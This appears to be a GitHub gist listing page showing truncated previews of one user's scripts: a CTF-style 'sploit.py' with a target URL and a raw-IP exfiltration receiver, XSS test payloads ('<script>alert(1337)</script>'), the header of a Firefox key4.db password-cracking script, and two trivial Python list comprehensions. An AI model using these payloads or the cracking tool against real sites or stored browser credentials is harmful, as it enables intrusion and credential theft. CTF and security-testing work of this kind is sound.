View sploit.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from flask import Flask | |
from flask import request | |
import string | |
import requests | |
from bs4 import BeautifulSoup | |
URL = "http://ninja.web.jctf.pro" | |
RECEIVER = "http://51.38.138.162:1338" | |
proxy = {} |
View rmi_dump.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# haqpl | |
# https://aweirdimagination.net/2020/06/28/kill-child-jobs-on-script-exit/ | |
cleanup() { | |
# kill all processes whose parent is this process | |
pkill -P $$ | |
} | |
for sig in INT QUIT HUP TERM; do | |
trap " |
View gist:5eb4c4070101299294eace17cfb0be69
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
alert(1) |
View test.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script>alert(1337)</script> |
View key4.db-crack.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Key4.db Mozilla Firefox Decrypt Script | |
# | |
# Clone of JTR Decrypt Scripts by synacl modified for mozilla firefox | |
# - RAR-JTR Decrypt Script - https://synacl.wordpress.com/2012/02/10/using-john-the-ripper-to-crack-a-password-protected-rar-archive/ | |
# - ZIP-JTR Decrypt Script - https://synacl.wordpress.com/2012/08/18/decrypting-a-zip-using-john-the-ripper/ | |
# haqpl - mozilla firefox decrypt | |
echo "Key4.db Mozilla Firefox Decrypt Script"; | |
if [ $# -ne 2 ] |
View listceven.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
a = [1, 4, 9, 16, 25, 36, 49, 64, 81, 100] | |
b = [c for c in a if c%2 == 0] |
View listc.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
a = [1, 4, 9, 16, 25, 36, 49, 64, 81, 100] | |
b = [c for c in a[:7]] |